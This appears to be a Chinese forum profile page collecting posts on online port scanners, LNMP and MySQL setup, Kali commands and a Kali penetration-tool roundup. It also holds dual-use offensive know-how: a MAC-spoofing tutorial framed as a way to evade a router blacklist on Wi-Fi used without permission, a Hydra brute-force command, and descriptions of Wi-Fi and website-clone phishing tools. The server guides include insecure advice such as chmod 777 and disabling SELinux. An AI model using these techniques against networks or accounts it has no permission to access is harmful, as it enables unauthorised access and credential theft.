跳转到帖子

ISHACK AI BOT

Members
  • 注册日期

  • 上次访问

ISHACK AI BOT 发布的所有帖子

  1. 当我们偶尔来兴趣想要扫面某个IP,或者想要隐匿扫描IP时,想过nmap的替代品吗?今天本文将推荐5款优秀的网站。以供使用! 使用 Nmap在线扫描的缺点是无法像从终端使用Nmap那样,轻松地运行Nmap 脚本。但是,当前大多数 Nmap 在线扫描方案通常会针对,最流行的端口执行扫描。 01 IPV6Scanner顾名思义,IPV6Scanner.com是一个网络扫描器,它允许任何用户针对任何主机名、基于 IPV4 或 IPv6 的地址执行端口扫描。 其简单的界面只需要您填写目标并点击扫描 便可对最常见的服务器端口执行默认扫描。 02 Nmap.onlineNmap online它可能是最经典的Nmap-looking替代解决方案。基于Web的应用程序,而不是在终端上运行的应用程序。 它提供了一个简单的界面来扫描任何域或 IP 地址,您可以选择要执行的扫描类型,例如快速扫描、端口扫描、操作系统检测或跟踪路由。 扫描完成后,您将获得 Nmap 扫描结果,以与传统 Nmap 相同的方式显示打开、过滤和关闭的端口,如下所示: 扫描结果如下: 扫描类型说明: 快速扫描这可能是最常用的选项,因为它可以让您扫描前 100 个最常见的端口 端口扫描可让您对端口 21、22、25、80、110、143、443 和 445 执行 TCP 扫描,并启用服务检测,因此您可以获得有关远程运行服务的数据 操作系统检测允许您检测远程主机上运行的操作系统。 03 ShodanShodan 是一个搜索引擎,专注于对来自任何连接设备的数据进行索引,例如计算机、服务器、手机、桌子、网络摄像头、智能电视、冰箱、智能厨房、医疗设备、交通信号灯、等物联网设备。 扫描结果 如上所示,它能够准确的获取目标开放的端口以及相应的端口信息。除了端口信息,还获得有关 IP 的详细信息,例如国家/地区、组织、ISP、上次更新日期、关联的主机名、ASN 以及在该 IP 上发现的正在运行的 Web 技术等等。 04 ZoomEyeZoomEye由中国网络安全公司Knownsec Inc.开发,是一款物联网搜索引擎,旨在成为网络空间的搜索引擎。与 Shodan 一样,ZoomEye 还提供有关端口扫描数据。 扫描如下暴露的22 端口以及操作系统、标签和地理位置,以及侦听该端口的软件版本,以及友好的端口统计。 当然ZoomEye还支持更高级的语法,下面简单的举个例。 命令说明例子空格表示或的运算逻辑service:"ssh" service:"http"搜索ssh或http协议的数据+则表示且的运算device:"router"+after:"2020-01-01"搜索2020-01-01后路由器的数据-则表示非的运算country:"CN"-subdivisions:"beijing"搜索中国地区内除北京的数据country:"CN"搜索国家地区资产可以使用国家缩写,也可以使用中/英文全称如country:"中国" country:"china"ip:"8.8.8.8"搜索IP的C段资产cidr:52.2.254.36/16 为IP的B段资产 cidr:52.2.254.36/8 为IP的A段资产port:80搜索相关端口资产目前不支持同时开放多端口目标搜索其他示例大家可以去官网看看。 05 SurfaceBrowserSurfaceBrowser™是一款完整的 Internet 表面分析器,可让您访问完整的数据安全平台,该平台包括当前和历史 DNS 记录、完整 IP 块、SSL 证书、托管域、关联域、完整的子域列表、用户代理每个 IP 的信息,当然还有开放端口和正在运行的服务。
  2. 关于这方面的教程可以说是一搜一大把,但都有点缺陷,在实际操作中各种坑,为了少踩坑。本文将为新手呈上最为全面的搭建教程。安装环境Nginx1.2PHP7.xMysql8.0 安装Nginx添加 CentOS 7 EPEL 存储库,请运行以下命令: yum install epel-release安装Nginx yum install nginx启动 Nginx 服务 systemctl start nginx开机启动 sudo systemctl enable nginx安装Mysql8.0添加mysql库 yum localinstall https://dev.mysql.com/get/mysql80-community-release-el7-1.noarch.rpm安装mysql yum --enablerepo=mysql80-community install mysql-community-server启动mysql systemctl start mysqld.service修改root密码 因为在mysql8中,在安装数据库时会设置默认密码。我们可以利用下面命令查看默认密码 grep 'A temporary password is generated for root@localhost' /var/log/mysqld.log |tail -1初始化数据库 sudo mysql_secure_installation这里会提示输入root的密码,即上一步获得的默认密码。然后从新输入root密码,一路输Y即可。 不知道为什么,修改后程序不能连接登录。用下面命令重新修改root密码。 mysql -u root -p use mysql; ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'youpassword'; systemctl restart mysqld #重启MySQL安装 PHP安装 Remi 存储库 yum install http://rpms.remirepo.net/enterprise/remi-release-7.rpm检查 Remi 存储库中可用的 PHP 7+ 版本 yum --disablerepo="*" --enablerepo="remi-safe" list php[7-9][0-9].x86_64你会看到这样的输出 Loaded plugins: fastestmirror Loading mirror speeds from cached hostfile * remi-safe: mirrors.ukfast.co.uk Available Packages php70.x86_64 2.0-1.el7.remi remi-safe php71.x86_64 2.0-1.el7.remi remi-safe php72.x86_64 2.0-1.el7.remi remi-safe php73.x86_64 2.0-1.el7.remi remi-safe php74.x86_64 1.0-3.el7.remi remi-safe php80.x86_64 1.0-3.el7.remi 启用相应的 PHP 版本(这里以7.4为例) sudo yum-config-manager --enable remi-php74安装php yum -y install php php-mysqlnd php-gd php-xml php-mbstring php-ldap php-pear php-xmlrpc php-zip php-cli php-fpm php-gd php-mysqlnd php-mbstring php-opcache php-pdo php-json配置文件配置php-fpm文件vim /etc/php-fpm.d/www.conf user和group变量默认为apache。我们需要将这些更改为nginx 找到listen php-fpm将通过 TCP 侦听特定主机和端口。我们想要更改此设置,使其侦听本地套接字文件,因为这会提高服务器的整体性能。 listen = /var/run/php-fpm/php-fpm.sock;最后,我们需要更改我们刚刚在listen指令中定义的套接字文件的所有者和组设置。找到listen.owner,listen.group和listen.mode指令。这些行默认被注释掉。通过删除;行开头的前置符号来取消注释。然后,将所有者和组更改为nginx: listen.owner = nginx listen.group = nginx listen.mode = 0660最后重启php-fpm systemctl start php-fpm 配置 Nginx 以处理 PHP目前的配置是无法访问php文件,我们还需要简单的配置下。 Nginx 有一个专用目录,我们可以在其中使用服务器块将每个托管网站定义为单独的配置文件。这类似于 Apache 的虚拟主机。 在默认安装中,此目录为空。我们将创建一个新文件作为此服务器上的默认 PHP 网站,它将覆盖/etc/nginx/nginx.conf文件中定义的默认服务器块。 在/etc/nginx/conf.d目录中打开一个新文件 vim /etc/nginx/conf.d/default.conf #内容如下: server { listen 80; #端口 可自行修改 如8080 server_name 192.168.x.x; #没有域名的话直接填写公网IP或内网IP root /var/www/html; #网站路劲 index index.php index.html index.htm; location / { try_files $uri $uri/ =404; } error_page 404 /404.html; error_page 500 502 503 504 /50x.html; location = /50x.html { root /var/www/html; #网站路劲 } #php配置部分 location ~ \.php$ { try_files $uri =404; fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } }重新启动 Nginx 以应用更改: sudo systemctl restart nginx配置网站目录用户组和权限因为目前php和nginx都是以nginx的身份运行,而我们的目录有时候权限归root所有。所以访问网站会出现404。 首先检查php和ngxin的用户组 ps -ef | grep php ps -ef | grep nginx最后修改相应目录的用户组权限 chown -R nginx:nginx /var/www/blog然后再次重启php和nginx即可 配置PATHINFO像Typecho一样,我们需要开启PATHINFONginx默认是不支持PATHINFO的,所以需要更改支持PATHINFO的主机的配置文件。 location ~ ^(.+\.php)(.*)$ { fastcgi_pass unix:/var/run/php-fpm/php-fpm.sock; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_split_path_info ^(.+\.php)(.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; include fastcgi_params; }并配置etc/php.ini cgi.fix_pathinfo=1最后重启nginx和php 目前遇到的问题就这么多了,后面遇到问题在说吧!
  3. 在本文中,您将学习如何在 Windows 和 Linux(ubuntu 和 Kali Linux)中通过MAC 欺骗手动以及通过 macchanger 软件更改 mac 地址。 之前写过一篇关于MAC的文章,大家对MAC有了初步的认识。那么MAC能改变吗? 答案是否定的,MAC地址是厂商直接写的网卡中的,不能改变,但是我们可以通过软件,模拟出MAC地址,完成欺骗! MAC地址是全世界计算机的唯一标识,网络中的每台设备都由其物理地址标识,无论网络是本地的还是公共的。当数据通过网络传输时,它也包括目标设备和源设备的 MAC 地址值。为什么要换mac有时候,我们蹭网。被被人从路由器中拉黑,无法上网。这时就需要改动MAC地址了。 windows10中修改mac首先打开cmd-ipconfig/all查看本机的mac地址 2 选择适配器并右键单击它,然后单击属性。 3 点击配置 -高级-网络地址-值将里面的值进行修改即可! 进行 MAC 欺骗在kali中我们利用macchanger完成欺骗。 如果其他debian和unbunt系列的,可直接执行apt-get install macchanger安装。 或者用下面的命令查看 macchanger -s eth0ech0 为你本地的网卡 欺骗 macchanger -m AA:AA:AA:AA:AA:AA eth0 这样我们便完成了mac地址的欺骗,简单吧!
  4. Kali Linux 命令有数以千计。而Kali Linux 是一种类似于其他基于 Linux 的操作系统。所以基本的Linux 命令与其命令类似。而新用户学习这些命令的最大问题是记得不清,记得不够系统。本文将从A~Z将常用的用来列举出来。方便小伙伴学习,本文较长建议收藏阅读!微信公众号kali黑客笔记 Kali Linux 中的系统命令Arch 命令您可以使用 arch 命令了解计算机体系结构。Arch 命令打印诸如“i386、i486、i586、alpha、arm、m68k、mips、sparc、x86_64 等”。 Arp 命令ARP 代表地址解析协议,用于查找给定 IPv4 地址的网络邻居的地址。 arp 命令用于显示您的 Kali Linux 系统的 arp 表。您可以在其他 Linux 系统以及 Windows 操作系统上使用此命令。 当然,我们可以利用它完成arp欺骗 arping 命令arping 命令类似于 ping 命令,但它在以太网层上工作。arping 命令给出本地网络中 IP 地址的可达性和往返时间的结果。 arping -i eth0 192.168.123.1 Aspell 命令aspell 是 Kali Linux 中的拼写检查器命令,您可以提供文件名或标准输入中的任何内容来检查拼写错误。 语法: aspell check [options] 文件名 aspell -c bbskali.txtawk 命令awk 命令用于操作数据并以脚本语言生成报告。它允许用户使用变量、数字函数和函数以及逻辑运算符。所以可以用awk 做一些实用程序。 AWK 操作: (a) 逐行扫描文件(b) 将每个输入行拆分为字段(c) 将输入行/字段与模式进行比较(d) 在匹配的行上执行操作编程结构: (a) 格式化输出行(b) 算术和字符串操作(c) 条件和循环 句法: awk 选项 'selection _criteria {action }' 输入文件 > 输出文件 #显示当前内存 echo `free |grep -w "内存"|awk '{print $3}'` bg 命令bg 命令用于控制 shell 作业。用来恢复已停止或挂起的进程和用于重新启动后停止的后台进程。 Bzip2Bzip2 是用于压缩和解压缩文件的基本实用程序 压缩文件: bzip2 -z bbskali.txt解压文件: bzip2 -d 22.txt.bz2 cal 命令cal 命令用于显示日历 cat 命令cat命令用于查看、编辑文件内的内容。 cat > 'New File' #创建一个新文件或覆盖所需文件上的数据 cat “文件名” #查看文件内的内容 cat >> “文件名” #向文件中添加一些数据cksum 命令cksum 命令代表校验和,用于计算每个输入文件的 CRC(循环冗余校验)和字节数,并将其写入标准输出。 Clear命令Clear命令用于在终端中运行多个命令时终端屏幕变满时清除终端屏幕。快捷键: ctrl+k cmp 命令cmp 命令用于逐字节比较两个文件。如果找到差异,它会报告找到第一个差异的字节和行号。 如果没有发现差异,默认情况下,cmp 不返回任何输出。 cmp 命令的基本语法 cmp file1.txt file2.txt comm 命令您可以使用 comm 命令逐行比较两个排序的文件。使用此命令的基本语法: comm file1.txt file2.txtcp命令cp 命令用于将一个或多个文件从一个位置复制到另一个位置。 如将22.txt文件复制root cp 22.txt /rootcrontab 命令定时任务命令,功能很强大,具体使用请看博客中的文章,之前写过。 crontab -e #编辑 crontab crontab -l #列出crontab 作业。 crontab -r #删除crontab。cut 命令cut 命令用于从指定文件或管道数据中剪切部分行并将结果打印输出。 显示文件的第1,3行数据 cut -f 1,3 22.txtdate命令date显示当前的日期 df 命令df 命令代表 Disk Free 用于报告文件系统磁盘空间使用情况.。 diff 命令diff 命令用于显示两个文件之间的差异。 diff3 命令Diff3 命令用于显示三个文件之间的差异。 dig 命令获取该网站的 DNS 相关的所有信息。 dir 命令dir 命令用于打印目录的内容列表。大多数 Linux 用户使用 ls 命令而不是 dir 命令。 echo 命令echo 命令是 Linux 中最基本的命令之一,用于在屏幕上显示消息。传递给 echo 的参数被打印到标准输出。 echo 通常用于 shell 脚本中以显示消息或输出其他命令的结果。 echo hello bbskali.cn egrep 命令egrep 命令用于在文件中搜索与文本模式匹配的行。 如:在zi.txt中查找是否有bbskali.cn多个值用|连接 egrep "bbskali.cn" zi.txtethtool命令如果要使用 ethtool 显示网络使用情况统计信息,请使用以下命令 ethtool -S eth0 whoami命令查看当前登录者 文件相关命令pwd 命令用于打印工作目录。它的意思是“你在什么位置”。 ls 命令ls 命令用于查看目录中的文件和目录。 cd 命令切换目录命令 mkdir 命令mkdir 命令用于创建目录。如果要在当前目录中创建目录,只需使用 mkdir 目录名。 mv 命令mv 命令在 Windows 中用作剪切和粘贴 mv 文件/文件夹名称 目标位置{目标位置 = 您要移动的位置} mv 命令也用于重命名文件和文件夹 mv 旧文件名 新文件名 rm 命令:rm 命令用于删除文件和文件夹。换句话说,此命令用于删除文件和文件夹。 基于 Kali Linux 的命令uname 命令“uname”代表(Unix Name),显示有关机器名称、操作系统和内核的详细信息。 uptime用于检查您的系统运行了多长时间。系统的正常运行时间,此命令也可用于取证。 uptime 14:30:34 up 4:52, 1 user, load average: 0.00, 0.03, 0.00sort命令可以按升序对文本文件的行进行排序。使用 -r 选项将按降序排序。 $sort filename.txt #升序 $sort -r 文件名.txt #降序free 命令显示当前内存信息 free -m history 命令history 命令用于查看最近运行的命令 高级 Kali Linux 系统命令find 命令用于在 Linux 中搜索文件 Find 是一个命令行实用程序,它允许您根据用户给定的表达式在目录层次结构中搜索文件和目录,并对每个匹配的文件应用用户指定的操作 如:查找所有的22.txt文件 find -name 22.txt apt-get 命令apt-get 是一个包管理器,用于安装、删除、清除和更新包。 dpkg 命令dpkg 命令用于在 Kali Linux 中安装 deb 文件。您也可以使用 dpkg 命令删除软件包。Kali Linux 是基于 Debian 的操作系统,因此您能安装 .deb 文件。 格式:dpkg -i 包名 du 命令du 命令用于显示文件和目录使用的磁盘空间量。 adduser 命令adduser 添加用户,即在Linux中添加用户。 passwd 命令passwd 命令修改密码 如修改root的密码 passwd rootusermod 命令usermod 命令用于修改组中的用户。 lsb_release 命令lsb_relase 命令用于检查 Kali Linux 的版本。 lsb_release -a SCP命令scp 命令用于将文件从一台设备安全地复制到另一台设备。有多种方法可以将文件从一个系统传输到另一个系统。 但是 scp 通过 ssh 协议复制文件。一个系统应该有一个 ssh 服务器正在运行。 scp [选项] [ user@ ]SRC_HOST:]file1_Path [ user@ ]DEST_HOST:]file2unzip 命令解压命令相当于Windows的右键-解压 unzip bbskali.zip后记当然在kali中还有很多好玩的命令,这里我就不在说了。更多教程可以关注我们的微信公众号Kali黑客笔记。
  5. 什么是 MAC 地址媒体访问控制也称为 MAC 地址,是实际属于设备本身并由其供应商分配的物理地址。该地址由 48 位组成,使用由双冒号分隔的 6 个八位字节(8 位/1 个字节)表示,并显示为十六进制值而不是二进制/十进制表示。该地址与 IP(互联网协议)一起用于确定网络(包括互联网)中传输数据包的目的地和源地址。 MAC地址本身实际上由两部分组成: 前三个八位字节被称为 OUI 或组织唯一标识符,它告诉我们该设备的供应商实际上是谁。 然而,最后三个八位字节通常被称为供应商分配的 ID,这将允许供应商识别该特定设备。 MAC 地址最终是数据链路层以太网协议的主要成分,它是网络中传输的大多数数据包的顶层,在使用 Wireshark 和其他监控软件检查数据包时可以很好地看到。 如,在windows下,我们可以利用ipconfig/all查看本机的MAC地址 根据MAC获取设置制造商只需要复制MAC地址的 OUI 部分,并在本网站https://www.wireshark.org/tools/oui-lookup.html中查询即可! OUI 查找工具Wireshark OUI 查找工具提供了一种查找OUI和其他 MAC 地址前缀的简单方法 。它使用 Wireshark 制造商数据库,该数据库是从多个来源编译而来的 OUI 和 MAC 地址列表。
  6. 1为PHP-FPM及Nginx创建专门的用户groupadd www useradd -s /sbin/nologin www -g www -M-s参数是表示不允许登录,-g参数是分配到www组,-M表示不创建用户目录。 2 安装phpCentOS8自带了PHP7.2版本,相对来说比较新,暂时不需要借助第三方的源来安装,而且CentOS8自带的PHP的模块也相对来说够用,使用下面命令可以看到所有PHP相关的包: yum search php安装模块 yum -y install php php-mysqlnd php-gd php-xml php-mbstring php-ldap php-pear php-xmlrpc php-zip php-cli php-fpm php-gd php-mysqlnd php-mbstring php-opcache php-pdo php-json配置PHP-FPM安装好了之后,我们还需要稍稍配置一下PHP-FPM,以让其更好的与Nginx进行配合工作。 编辑/etc/php-fpm.d/www.conf 文件,这个文件有两个需要注意的地方,其中一个就是运行PHP-FPM的用户及对应的用户组: vim /etc/php-fpm.d/www.conf user = www group = www listen = /run/php-fpm/www.sock修改上述文件,将其中的user及group字段由apache更改成上述我们创建的www。 另外一个就是listen = /run/php-fpm/www.sock 这个配置项,这一行配置了PHP-FPM运行模式及对应的文件目录,我们后面配置Nginx时会用到它。 启动: systemctl start php-fpmNginx安装及配置安装Nginx很简单,CentOS8系统源自带,只需要一行命令就能安装好: yum install nginx启动: systemctl start nginx基础配置也很简单,到这一步,我们只需要稍稍改动一下Nginx的配置文件就行,Nginx的配置文件在/etc/nginx/nginx.conf,这个配置文件能配置Nginx所有的功能,包括其他的配置文件也是通过这个文件进行加载。打开其配置文件,修改user字段,并增加几行可能会用上的配置: vim /etc/nginx/nginx.conf user = www www; //开启gzip压缩 gzip on; //关闭Nginx版本号显示 server_tokens off; //增加最大上传文件大小 client_max_body_size 8M;MySQL 8安装安装MySQL8及对应工具: yum install mysql mysql-server启动MySQL服务器: systemctl start mysqld初始化命令mysql_secure_installation 为网站添加单独的Nginx配置文件其实放置网站的Nginx配置文件各个发行版都有自己的做法,有些是放在/etc/nginx/conf.d/ vim /etc/nginx/conf.d/ln.conf server { listen 80; listen 8085; listen [::]:8085; listen [::]:80; server_name 192.168.123.98; index index.php index.html index.htm default.php default.htm default.html; root /var/www/ln/public; #运行目录 include /etc/nginx/default.d/*.conf; index index.php index.html index.htm; location ~ \.(php|phar)(/.*)?$ { #php访问配置 fastcgi_split_path_info ^(.+\.(?:php|phar))(/.*)$; fastcgi_intercept_errors on; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass unix:/run/php-fpm/www.sock; } #伪静态配置 location / { if (!-e $request_filename){ rewrite ^(.*)$ /index.php?s=$1 last; break; } } access_log /var/log/nginx/ln.log; error_log /var/log/nginx/ln-error.log; }网站文件目录赋予可读写权限chown -R www.www /var/www/ln常见问题不能解析php文件 配置ln.conf文件 include /etc/nginx/default.d/*.conf; index index.php index.html index.htm; location ~ \.(php|phar)(/.*)?$ { fastcgi_split_path_info ^(.+\.(?:php|phar))(/.*)$; fastcgi_intercept_errors on; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $fastcgi_script_name; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass unix:/run/php-fpm/www.sock; }502cd /var//run/php-fpm/ chmod -R 777 www.sock /var/lib/php/ sessionnginx 不能启动setenforce 0
  7. 本文所关注的20个Kali Linux渗透工具,是根据最常使用和最喜欢标准筛选出来的。故可能部分优秀的工具没有编入。如有更好的建议,请您留言我们做以修正! 信息收集类01 traceroutetraceroute是用来检测发出数据包的主机到目标主机之间所经过的网关数量的工具。traceroute的原理是试图以最小的TTL(存活时间)发出探测包来跟踪数据包到达目标主机所经过的网关,然后监听一个来自网关ICMP的应答。 traceroute bbskali.cn 如上列出的 IP 地址跃点还包括我当前的 Internet 服务提供商。还包括路由器网关。此扫描步骤以公开 IP 地址的范围。 02 nmapNmap是一个著名的网络扫描工具,在之前的文章中,我们有很多这方面的教程,感兴趣的可以去看看。我们利用traceroute获取IP地址后,便可以利用nmap获取相应的端口和服务。 Nmap -v -sS [你想要的 IP 目标] -Pn 后期渗透利用类03 Msfconsole想必这个大家有用过吧,没错它是 Kali Linux 下最受好评的工具之一。漏洞利用可以定义为攻击者识别的系统、应用程序或服务上的漏洞。一个exploit有四个主要属性:payload、Auxiliary、Encoders和Post。 工具的具体使用,这里不说了。 嗅探和欺骗类04 wiresharkWireshark 是一个网络分析工具。通过显示过滤数据包,攻击者可以在其中捕获暴露的密码。也可以显示与指定端口 以及 ICMP 流量相关的结果。 05 Bettercap通过Bettercap,可以配合SSLstrip+ 和 dns2proxy(DNS 服务器)绕过 HSTS 预加载、HSTS 和 SSL/TLS。通过 HTTP 重定向将访问特定域名的客户端重定向到虚假域名。 06 社会工程大哥大 SETSET 是一个开源渗透框架,在其执行过程中实现了各种自定义攻击向量。它们包括群发邮件、鱼叉式网络钓鱼、网络钓鱼和恶意 USB。 WIFI安全类07fluxionfluxion通过其创建的开放式双 AP为目标。用户需要连接到设置的 Wi-Fi 网络的实例会导致弹出伪造的身份验证网络页面。然后,该用户在不知不觉中输入了wifi密码而达到钓鱼的目的。 08 Aircrack-NG 套件感觉Aircrack-NG 就是神一样的存在,无论是那种WiFi攻击的手段,都是离不开它的存在。 密码破解09 Hydra它是一种在线密码破解服务。该密码攻击工具被评为网络安全领域中速度最快的工具之一。它对许多攻击协议的支持使它成为一个有信誉的网络登录破解器。它的一些著名和支持的协议包括 XMPP、Cisco AAA、VNC、Cisco Auth、VMware-auth、Cisco-auth、Telnet、CVS、Teamspeak(TS2)、FTP、Subversion、SSHKEY、SOCKS5、SMTP Enum、SMTP、SIP 、Rlogin、RDP、PostgreSQL、ORACLE SID、ORACLE 侦听器、HTTP(S)-HEAD 和 HTTP(S)-FORM-GET。 示例: hydra -l user -P passlist.txt ftp://192.168.0.1 10 JohnJohn是著名的离线密码破解服务。John the Ripper可以有效地破解程序和测试密码。其功能算法可以分解为三个步骤。 首先,它一次预先打包并结合了多个密码破解程序的功能。 其次,它会自动检测目标密码的哈希值。 最后,它集成了一个定制的密码破解器来完成攻击。例如,Linux 系统将在文件路径/etc/ password上拥有系统的用户密码。 11 CrunchCrunch 可以说是一个轻便的密码字典生成工具,通过各种组合,生成我们所需要的密码。 crunch <min> max<max> <characterset> -t <pattern> -o <output filename>12 Hash-Identifier 和 FindMyHash弱加密的用户密码或数据将成为散列标识符密码攻击的受害者,因为散列标识符工具会识别并暴露与它们相关联的各种散列。另一方面,Findmyhash 将利用在线服务成功破解加密的用户数据和密码。Hash-Identifier 工具的使用首先需要渗透测试人员或攻击者识别相关的用户密码或数据哈希类型。它将解密提供的数据或密码并识别使用的散列算法。接下来,Findmyhash 工具将破解提供的用户数据或密码。 数据库类13 sqlmap利用SQLMap工具快速自动化快速的完成含有sql注入漏洞的网站。 WEB相关14 JoomScan 和 WPScanJoomScan 工具针对 Joomla CMS Web 应用程序的扫描和分析。相比之下,WPScan 工具将扫描和分析 WordPress CMS Web 应用程序上的任何漏洞。通过 CMSMap 和 ONLINE CMS Scanner 等工具可以轻松识别目标网站的 CMS 类型。 15 HTTRACKHTTRACK可以有效地克隆网页或网站。它主要用于通过网络钓鱼创建虚假网站克隆或服务器攻击。 16 OWASP-ZAP基于 Java 的平台测试 Web 应用程序。使用直观的GUI,具有攻击、蜘蛛、模糊测试、代理和脚本 Web 应用程序。 17 BurpSuite主要功能是能够充当代理拦截器,使其能够劫持 Web服务器和Web浏览器之间存在的流量。当然也是不可缺少神器之一! 18 web漏洞扫描 nikto主要评估 Web 应用程序和 Web 服务器,并暴露明显的安全漏洞或其他相关问题。 19 dirbdirb 是一款web目录爬行工具。主要识别web程序的目录,如获取网站后台目录。 20 WhatWebwhatweb是一款web指纹识别工具,可以获取web程序的cms框架。以及各种web环境。
  8. 无需任何环境,便可获取服务器磁盘、内存、负载、等相关使用情况。使用方法vim bbskali.sh #创建sh文件,将下面的代码复制到里面。 chmod+x bbskali.sh #添加运行权限 bash bbskali.sh会在root目录下生成bbskali.html文件!浏览器打开即可! 效果代码#!/bin/bash ip=`ifconfig |grep -w inet |grep inet|grep -v 127 |awk '{print $2}'` a=`df -hT|grep -w "/"|awk '{print $1}'` b=`df -hT|grep -w "/"|awk '{print $2}'` c=`df -hT|grep -w "/"|awk '{print $3}'` d=`df -hT|grep -w "/"|awk '{print $4}'` e=`df -hT|grep -w "/"|awk '{print $5}'` f=`df -hT|grep -w "/"|awk '{print $6}'` g=`df -hT|grep -w "/"|awk '{print $7}'` #free-h neic=`free -h|grep -w "Mem"|awk '{print $1}'` total=`free -h|grep -w "Mem"|awk '{print $2}'` used=`free -h|grep -w "Mem"|awk '{print $3}'` free=`free -h|grep -w "Mem"|awk '{print $4}'` shared=`free -h|grep -w "Mem"|awk '{print $5}'` cache=`free -h|grep -w "Mem"|awk '{print $6}'` available=`free -h|grep -w "Mem"|awk '{print $7}'` #fuzai fuzai=`uptime |awk 'sub(/,/,"",$11)'|awk '{print $11}'` cp=`df -hT|grep -w "/"| awk 'sub(/%/,"",$6)'|awk '{print $6}'` nc1=`free |grep -w "Mem"|awk '{print $2}'` nc2=`free |grep -w "Mem"|awk '{print $3}'` html="<html> <meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no\"> <link rel=\"stylesheet\" href=\"https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css\" integrity=\"sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu\" crossorigin=\"anonymous\"> <script type=\"text/javascript\" src=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/echarts.min.js\"></script> <head> <style type=\"text/css\"> .bian{ display: grid; margin: 0 auto; box-shadow: 0px 0px 20px -5px rgb(158 158 158 / 22%); border-radius: 8px; text-align: center; background: #fff; } </style> </head> <body> <div class=\"bian\"> <div class=\"panel panel-default\"> <div class=\"panel-body table-responsive \"> <div class=\"panel-heading\"><i class=\"glyphicon glyphicon-search\"></i>告警主机:$ip</div> <div style=\"width: 350px;height: 350px; \"> <div id=\"container\" style=\"height: 90%;text-align: center;font-size: 8px;\"></div> </div> <table class=\"table table-bordered table-hover table-condensed\" align=center > <tr class=\"active\"> <td>文件系统</td><td>类型</td><td>总共</td><td>已用</td><td>可用</td><td>使用率</td><td>挂载点</td> </tr> <tr class=\"warning\"> <td>$a</td><td>$b</td><td>$c</td><td>$d</td><td>$e</td><td style=\"color:red;font-weight:bold\">$f</td><td>$g</td> </tr> <tr class=\"active\"> <td>Mem信息</td><td>总量</td><td>已用</td><td>剩余</td><td>交换</td><td>缓冲</td><td>可用</td> </tr> <tr class=\"danger\"> <td>$neic</td><td>$total</td><td>$used</td><td>$free</td><td>$shared</td><td style=\"color:red;font-weight:bold\">$cache</td><td>$available</td> </tr> </table> </div> </div> </div> <script type=\"text/javascript\"> var dom = document.getElementById(\"container\"); var myChart = echarts.init(dom); var app = {}; var num =$nc2/$nc1; num = num.toFixed(3)*100; console.log(num); var option; const gaugeData = [ { value: $fuzai*100, name: '负载', title: { offsetCenter: ['0%', '-30%'] }, detail: { valueAnimation: true, offsetCenter: ['0%', '-20%'] } }, { value: num, name: 'Mem使用率', title: { offsetCenter: ['0%', '0%'] }, detail: { valueAnimation: true, offsetCenter: ['0%', '10%'] } }, { value: $cp, name: '磁盘使用率', title: { offsetCenter: ['0%', '30%'] }, detail: { valueAnimation: true, offsetCenter: ['0%', '40%'] } } ]; option = { series: [ { type: 'gauge', startAngle: 90, endAngle: -270, pointer: { show: false }, progress: { show: true, overlap: false, roundCap: true, clip: false, itemStyle: { borderWidth: 1, borderColor: '#464646' } }, axisLine: { lineStyle: { width: 40 } }, splitLine: { show: false, distance: 0, length: 50 }, axisTick: { show: false }, axisLabel: { show: false, distance: 50 }, data: gaugeData, title: { fontSize: 12 }, detail: { width: 50, height: 12, fontSize: 12, color: 'auto', borderColor: 'auto', borderRadius: 20, borderWidth: 1, formatter: '{value}%' } } ] }; if (option && typeof option === 'object') { myChart.setOption(option); } </script> </body> </html>" echo -e "$html" >/root/bbskali.html `` ### 后记 水平有限,不懂得地方请各位大佬赐教!
  9. 下载并解压wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz tar xvf mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz mv mysql-8.0.26-linux-glibc2.12-x86_64 mysql 进入 /USR/LOCAL 目录下,创建用户和用户组并授权 cd /usr/local/ groupadd mysql useradd -r -g mysql mysql cd mysql/ #注意:进入mysql文件下授权所有的文件 chown -R mysql:mysql ./ 修改/USR/LOCAL/MYSQL当前目录的用户 chown -R root:root ./ #注意:一定要进入 /usr/local/mysql 目录下 chown -R mysql:mysql data初始化数据库bin/mysqld --initialize --user=mysql --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data记录初始密码 配置my.cnf其中 my.cnf 配置的内容为: [mysqld] character_set_server=utf8mb4 basedir=/usr/local/mysql datadir=/usr/local/mysql/data log-error = /usr/local/mysql/data/error.log pid-file = /usr/local/mysql/data/mysql.pid port=3306 server_id=1 socket=/tmp/mysql.sock skip-name-resolve sql_mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES设置开机自启cd support-files/ cp mysql.server /etc/init.d/mysql chmod +x /etc/init.d/mysql注册服务chkconfig --add mysqlETC/LD.SO.CONF要配置路径,不然报错vim /etc/ld.so.conf #添加如下内容: /usr/local/mysql/lib配置环境变量vim /etc/profile #添加如下内容: MYSQL_HOME=/usr/local/mysql PATH=$MYSQL_HOME/bin:$MYSQL_HOME/lib:$PATH export PATH source /etc/profile #注意:一定要执行该命令,否则配置无效 启动服务service mysql start若mysql运行报错,可以直接到log-error = /usr/local/mysql/data/error.log目录下直接查看错误日志 利用初始化密码登录 修改ROOT密码ALTER USER USER() IDENTIFIED BY '123456789@@'; #后期修改密码 use mysql; update user set password=password("lnds12345@@") where user="root"; flush privileges;##刷新权限 这样mysql就完成了。
